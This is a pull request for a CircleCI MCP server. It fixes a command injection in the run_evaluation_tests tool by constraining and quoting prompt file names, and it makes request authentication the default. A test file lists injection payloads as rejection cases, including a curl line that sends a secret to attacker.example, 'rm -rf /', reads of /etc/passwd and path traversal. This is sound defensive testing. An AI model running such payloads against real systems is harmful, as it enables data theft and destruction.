### PR TITLE
fix(security): prevent command injection in run_evaluation_tests

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,16 @@ All notable changes to this project will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
+## [0.16.1] - 2026-06-09
+
+### Security
+
+- Fixed a command injection in the `run_evaluation_tests` tool. The caller-supplied `promptFiles[].fileName` was interpolated unquoted into shell commands inside the generated pipeline config, allowing arbitrary command execution in the CircleCI runner under the server's token. `fileName` is now constrained to `/^[A-Za-z0-9._-]+$/` at the schema boundary and single-quoted at every interpolation site (#169)
+
+### Changed
+
+- Remote HTTP request authentication is now secure by default. `REQUIRE_REQUEST_TOKEN` defaults to required; operators running the shared-token mode must now set `REQUIRE_REQUEST_TOKEN=false` to allow unauthenticated requests. **Breaking** for existing shared-token deployments that relied on no auth (#169)
+
 ## [0.16.0] - 2026-06-09
 
 ### Added

--- a/README.md
+++ b/README.md
@@ -469,7 +469,9 @@ Run the MCP server centrally (for example on Kubernetes or Docker) so your team 
 | Mode | When to use | Server setup | Client setup | CircleCI audit trail |
 |------|-------------|--------------|--------------|----------------------|
 | **Per-user tokens** (recommended) | Teams with SSO-backed Personal API Tokens | `REQUIRE_REQUEST_TOKEN=true`, no server PAT | Each dev forwards their PAT | Per developer |
-| **Shared token** (interim) | Quick rollout, single service identity OK | `CIRCLECI_TOKEN` on server, no `REQUIRE_REQUEST_TOKEN` | No auth header needed | Single shared identity |
+| **Shared token** (interim) | Quick rollout, single service identity OK | `CIRCLECI_TOKEN` on server, `REQUIRE_REQUEST_TOKEN=false` (explicit opt-out) | No auth header needed | Single shared identity |
+
+> **Security:** Request authentication is **on by default** in remote mode. The shared-token mode disables it (`REQUIRE_REQUEST_TOKEN=false`), making every caller able to act as the server's `CIRCLECI_TOKEN` identity with no credentials. Only enable it on a network you fully trust, and prefer per-user tokens otherwise. Terminating TLS at an ingress provides encryption, not authentication.
 
 ### 1. Deploy the server
 
@@ -492,6 +494,7 @@ docker run --rm -p 8000:8000 \
   -e start=remote \
   -e port=8000 \
   -e CIRCLECI_TOKEN=your-shared-circleci-pat \
+  -e REQUIRE_REQUEST_TOKEN=false \
   circleci/mcp-server-circleci
 ```
 
@@ -501,7 +504,7 @@ docker run --rm -p 8000:8000 \
 |----------|-------------|
 | `start=remote` | Starts the HTTP+SSE MCP server instead of stdio |
 | `port` | Listening port inside the container (default: `8000`) |
-| `REQUIRE_REQUEST_TOKEN=true` | Reject requests without `Authorization: Bearer` or `Circle-Token` header |
+| `REQUIRE_REQUEST_TOKEN` | Reject requests without `Authorization: Bearer` or `Circle-Token` header. Defaults to required; set `REQUIRE_REQUEST_TOKEN=false` to allow unauthenticated requests (shared-token mode) |
 | `CIRCLECI_TOKEN` | Shared fallback PAT for all requests when per-user headers are not sent |
 | `CIRCLECI_BASE_URL` | Optional — required for on-prem only (default: `https://circleci.com`) |
 | `DISABLE_TELEMETRY=true` | Opt out of usage metrics export |
@@ -562,7 +565,7 @@ Replace `http://localhost:8000/mcp` with your team's server URL. Cursor and VS C
 
 #### Client configuration: shared token
 
-When the server has `CIRCLECI_TOKEN` set and `REQUIRE_REQUEST_TOKEN` is **not** enabled, clients do not need to send a token:
+When the server has `CIRCLECI_TOKEN` set and is started with `REQUIRE_REQUEST_TOKEN=false` (request auth is on by default and must be explicitly disabled), clients do not need to send a token:
 
 ```json
 {

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@circleci/mcp-server-circleci",
-  "version": "0.16.0",
+  "version": "0.16.1",
   "description": "A Model Context Protocol (MCP) server implementation for CircleCI, enabling natural language interactions with CircleCI functionality through MCP-enabled clients",
   "type": "module",
   "access": "public",

--- a/src/lib/auth/extractToken.test.ts
+++ b/src/lib/auth/extractToken.test.ts
@@ -67,12 +67,22 @@ describe('isRequestTokenRequired', () => {
     process.env = originalEnv;
   });
 
-  it('should be false by default', () => {
-    expect(isRequestTokenRequired()).toBe(false);
+  it('should be true by default (secure by default)', () => {
+    expect(isRequestTokenRequired()).toBe(true);
   });
 
   it('should be true when REQUIRE_REQUEST_TOKEN is true', () => {
     process.env.REQUIRE_REQUEST_TOKEN = 'true';
+    expect(isRequestTokenRequired()).toBe(true);
+  });
+
+  it('should be false only when explicitly opted out with REQUIRE_REQUEST_TOKEN=false', () => {
+    process.env.REQUIRE_REQUEST_TOKEN = 'false';
+    expect(isRequestTokenRequired()).toBe(false);
+  });
+
+  it('should be true for any non-false value', () => {
+    process.env.REQUIRE_REQUEST_TOKEN = 'no';
     expect(isRequestTokenRequired()).toBe(true);
   });
 });

--- a/src/lib/auth/extractToken.ts
+++ b/src/lib/auth/extractToken.ts
@@ -24,6 +24,12 @@ export function extractCircleCITokenFromRequest(
   return undefined;
 }
 
+/**
+ * Whether the remote HTTP transport must reject requests that carry no
+ * CircleCI token. Secure by default: a request token is required unless an
+ * operator explicitly opts out with REQUIRE_REQUEST_TOKEN=false (the
+ * "shared token" deployment). Only consulted by the remote transport.
+ */
 export function isRequestTokenRequired(): boolean {
-  return process.env.REQUIRE_REQUEST_TOKEN === 'true';
+  return process.env.REQUIRE_REQUEST_TOKEN !== 'false';
 }

--- a/src/tools/runEvaluationTests/handler.test.ts
+++ b/src/tools/runEvaluationTests/handler.test.ts
@@ -378,6 +378,13 @@ describe('runEvaluationTests handler', () => {
     expect(configContent).toContain('test1.prompt.json');
     expect(configContent).toContain('test2.prompt.yml');
     expect(configContent).toContain('python eval.py');
+
+    // File names must be single-quoted at every interpolation site so they
+    // cannot escape into shell (defense-in-depth alongside schema validation).
+    expect(configContent).toContain("sudo tee '/prompts/test1.prompt.json'");
+    expect(configContent).toContain("sudo tee '/prompts/test2.prompt.yml'");
+    expect(configContent).toContain("python eval.py 'test1.prompt.json'");
+    expect(configContent).toContain("python eval.py 'test2.prompt.yml'");
   });
 
   it('should process JSON files with proper formatting', async () => {

--- a/src/tools/runEvaluationTests/handler.ts
+++ b/src/tools/runEvaluationTests/handler.ts
@@ -155,7 +155,7 @@ export const runEvaluationTests: ToolCallback<{
       (file, index) =>
         `          if [ "$CIRCLE_NODE_INDEX" = "${index}" ]; then
             sudo mkdir -p /prompts
-            echo "${file.base64GzippedContent}" | base64 -d | gzip -d | sudo tee /prompts/${file.fileName} > /dev/null
+            echo "${file.base64GzippedContent}" | base64 -d | gzip -d | sudo tee '/prompts/${file.fileName}' > /dev/null
           fi`,
     )
     .join('\n');
@@ -165,7 +165,7 @@ export const runEvaluationTests: ToolCallback<{
     .map(
       (file, index) =>
         `          if [ "$CIRCLE_NODE_INDEX" = "${index}" ]; then
-            python eval.py ${file.fileName}
+            python eval.py '${file.fileName}'
           fi`,
     )
     .join('\n');

--- a/src/tools/runEvaluationTests/inputSchema.test.ts
+++ b/src/tools/runEvaluationTests/inputSchema.test.ts
@@ -1,0 +1,38 @@
+import { describe, it, expect } from 'vitest';
+import { runEvaluationTestsInputSchema } from './inputSchema.js';
+
+describe('runEvaluationTestsInputSchema fileName validation', () => {
+  const parse = (fileName: string) =>
+    runEvaluationTestsInputSchema.safeParse({
+      projectSlug: 'gh/org/repo',
+      branch: 'main',
+      promptFiles: [{ fileName, fileContent: 'name: poc\n' }],
+    });
+
+  it('accepts ordinary prompt file names', () => {
+    expect(parse('bedtime-story-generator.prompt.yml').success).toBe(true);
+    expect(parse('test_1.prompt.json').success).toBe(true);
+  });
+
+  it('rejects shell metacharacters used for command injection', () => {
+    const payloads = [
+      'x.yml; curl https://attacker.example/?leak=$(printf %s "$SECRET" | base64); #',
+      'x.yml; rm -rf /',
+      'x.yml`whoami`',
+      'x.yml$(id)',
+      'x.yml | cat /etc/passwd',
+      'x.yml && echo pwned',
+      "x'.yml",
+      'file with spaces.yml',
+    ];
+    for (const fileName of payloads) {
+      expect(parse(fileName).success, fileName).toBe(false);
+    }
+  });
+
+  it('rejects path traversal and absolute paths', () => {
+    expect(parse('../../etc/cron.d/evil').success).toBe(false);
+    expect(parse('/etc/passwd').success).toBe(false);
+    expect(parse('sub/dir/file.yml').success).toBe(false);
+  });
+});

--- a/src/tools/runEvaluationTests/inputSchema.ts
+++ b/src/tools/runEvaluationTests/inputSchema.ts
@@ -45,7 +45,13 @@ export const runEvaluationTestsInputSchema = z.object({
   promptFiles: z
     .array(
       z.object({
-        fileName: z.string().describe('The name of the prompt template file'),
+        fileName: z
+          .string()
+          .regex(
+            /^[A-Za-z0-9._-]+$/,
+            'fileName may only contain letters, numbers, dot, underscore, and hyphen',
+          )
+          .describe('The name of the prompt template file'),
         fileContent: z
           .string()
           .describe('The contents of the prompt template file'),


### PR DESCRIPTION
## Summary

Fixes an **unauthenticated command injection → RCE** in the `run_evaluation_tests` tool (reported via coordinated disclosure, confirmed at ≤ 0.15.1).

The tool builds a CircleCI pipeline config from caller-supplied input and submits it to the API for execution. The `promptFiles[].fileName` parameter — declared as an unconstrained `z.string()` — was interpolated **unquoted** into shell commands inside that config:

- `handler.ts`: `... | sudo tee /prompts/${file.fileName} > /dev/null`
- `handler.ts`: `python eval.py ${file.fileName}`

A `fileName` like `x.yml; <attacker shell>; #` escapes into arbitrary command execution in the CircleCI runner, under the server's `CIRCLECI_TOKEN`. In the documented "Shared token (interim)" remote deployment the server required no auth, making the caller an unauthenticated network client.

## Changes

1. **Schema allowlist** (`inputSchema.ts`) — `fileName` must match `/^[A-Za-z0-9._-]+$/`, rejecting shell metacharacters (`;` `$` `` ` `` `|` `&` quotes spaces) and path traversal (`/`, `..`) before the handler runs.
2. **Defense-in-depth quoting** (`handler.ts`) — `fileName` is single-quoted at both interpolation sites.
3. **Secure-by-default auth** (`extractToken.ts`) — `isRequestTokenRequired()` now returns `true` unless `REQUIRE_REQUEST_TOKEN=false` is set explicitly. Only affects the remote HTTP transport; stdio is unchanged.
4. **README** — documents the `REQUIRE_REQUEST_TOKEN=false` opt-out for shared-token mode + a security note.

## ⚠️ Breaking change

Existing **shared-token remote** deployments that relied on no-auth must now set `REQUIRE_REQUEST_TOKEN=false`, or they will start returning `401`. This is intentional (fail-closed). Call this out in release notes.

## Testing

- `pnpm test:run` → **280 passed**. New `inputSchema.test.ts` rejects the PoC payloads + traversal; `handler.test.ts` asserts the config is single-quoted; `extractToken.test.ts` covers the flipped auth default.
- Verified **end-to-end against the built server over stdio** with the exact report PoC `fileName`:
  - Malicious payload → rejected with MCP error `-32602` *"fileName may only contain letters, numbers, dot, underscore, and hyphen"*, **before** any config build or API call.
  - Clean `bedtime.prompt.yml` → passes validation and proceeds normally.

## Out of scope (follow-ups)

- Passing file content/names via CircleCI pipeline parameters instead of generating shell.
- Broader audit of other tools for similar interpolation sinks.

🤖 Generated with [Claude Code](https://claude.com/claude-code)